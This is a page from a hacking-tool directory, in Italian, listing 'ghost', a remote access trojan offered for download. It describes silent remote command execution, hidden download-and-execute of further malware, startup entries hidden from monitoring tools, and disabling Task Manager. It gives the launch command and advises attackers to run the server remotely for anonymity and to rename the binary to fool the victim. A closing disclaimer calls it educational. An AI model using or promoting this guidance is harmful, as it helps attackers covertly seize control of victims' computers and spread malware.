Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
ghost — 👻 RAT (Trojan di Accesso Remoto) - Botnet Silenziosa - Accesso completo alla riga di comando remota - Download ed esecuzione di programmi - Diffusione di virus e malware | Kitploit
Strumenti/GitHubGitHub/ahxr/ghost
Meccanismi di PersistenzaPost-ExploitAnalisi MalwareCommand and ControlApprendimento e FormazioneRed TeamingSviluppo PayloadTrojan di Accesso Remoto
GitHubahxr/ghost

ghost

👻 RAT (Trojan di Accesso Remoto) - Botnet Silenziosa - Accesso completo alla riga di comando remota - Download ed esecuzione di programmi - Diffusione di virus e malware

Vedi Repository
1.1k2265 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

ghost


ghost è un RAT leggero che fornisce al server/attaccante accesso remoto completo all'interprete della riga di comando dell'utente (cmd.exe). Gli è consentito eseguire comandi in silenzio senza che il client/zombie se ne accorga. Al server/attaccante viene inoltre data la possibilità di scaricare ed eseguire file sul computer del client/zombie. Anche questo è un processo silenzioso e nascosto. Come la maggior parte dei Remote Access Trojan, questa capacità di download ed esecuzione aiuta a distribuire virus e altri malware.

Questo malware viene distribuito semplicemente eseguendo zombie.exe. Il nome del file può essere cambiato a piacere. Non ci sono restrizioni. Quando viene eseguito, cerca i primi due argomenti (IP e Porta). Se nessuno dei due viene fornito, il programma non viene eseguito. Detto questo, assicurati di fornire l'IP e la Porta del server negli argomenti della riga di comando. Esempio:

root@kitploit:~
zombie.exe 127.0.0.1 27015

Caratteristiche del Bot

  • Esecuzione remota di comandi
  • Processo silenzioso in background
  • Download ed esecuzione di file (nascosto)
  • Avvio in modalità provvisoria
  • Si connette automaticamente al server
  • I dati inviati e ricevuti sono crittografati (cifrario di sostituzione)
  • I file sono nascosti
  • Antivirus installato mostrato al server
  • Diffonde facilmente malware tramite la funzione di download
  • Le informazioni di avvio non vengono mostrate in msconfig o in altri programmi di controllo dell'avvio come CCleaner
  • Disabilita Task Manager

Quando viene avviato con successo, si aggiunge al pool di avvio e viene eseguito silenziosamente in background. Proverà a connettersi ripetutamente al server. Questo processo non assorbe memoria o utilizzo della CPU. Ciò significa che lo zombie resterà semplicemente inattivo in background e, ogni volta che il server è attivo, si connetterà automaticamente.

Quando si avvia il server, ti verrà chiesta una porta in ascolto. Questa è la porta che devi usare nella riga di comando per zombie.exe. Una volta fornita la porta, verranno mostrate le informazioni del server e il menu scomparirà. L'indirizzo IP fornito è il tuo IP esterno. Detto questo, a meno che il client/zombie non stia attivamente cercando e monitorando le connessioni aperte, sarà probabilmente saggio eseguire questo server in una posizione remota se vuoi rimanere anonimo. Se questo non ti interessa, ti basterà rinominare zombie.exe e/o modificare le informazioni dell'assembly usando uno strumento per ingannare il client/zombie.

Nota: Questo progetto è stato creato solo a scopo educativo e per testare i miei repository pubblicati di recente (ahxrlogger e ahxrsocket). Se scegli di usarlo per scopi dannosi, sei completamente responsabile dell'esito.

Scarica lo strumento